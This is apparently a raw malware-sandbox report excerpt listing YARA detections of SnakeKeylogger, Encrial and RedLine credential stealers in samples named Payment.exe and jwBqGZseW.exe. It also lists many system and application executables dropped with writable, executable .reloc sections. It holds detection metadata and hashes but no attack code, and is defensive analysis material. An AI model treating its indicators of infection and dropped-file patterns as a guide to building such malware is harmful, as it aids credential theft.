                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Payment.exe.3f7a328.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Payment.exe.411b348.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Payment.exe.3f7a328.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 18.2.jwBqGZseW.exe.44e24c8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: pingsender.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: plugin-container.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: private_browsing.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: updater.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info_x64.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3Help.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: DiagnosticsHub.StandardCollector.Service.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jucheck.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jusched.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jabswitch.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: updater.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java-rmi.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javacpl.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PerceptionSimulationService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MsSense.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SensorDataService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SgrmBroker.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pack200.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: policytool.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmid.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmiregistry.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: servertool.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssvagent.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: tnameserv.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: unpack200.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Spectrum.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
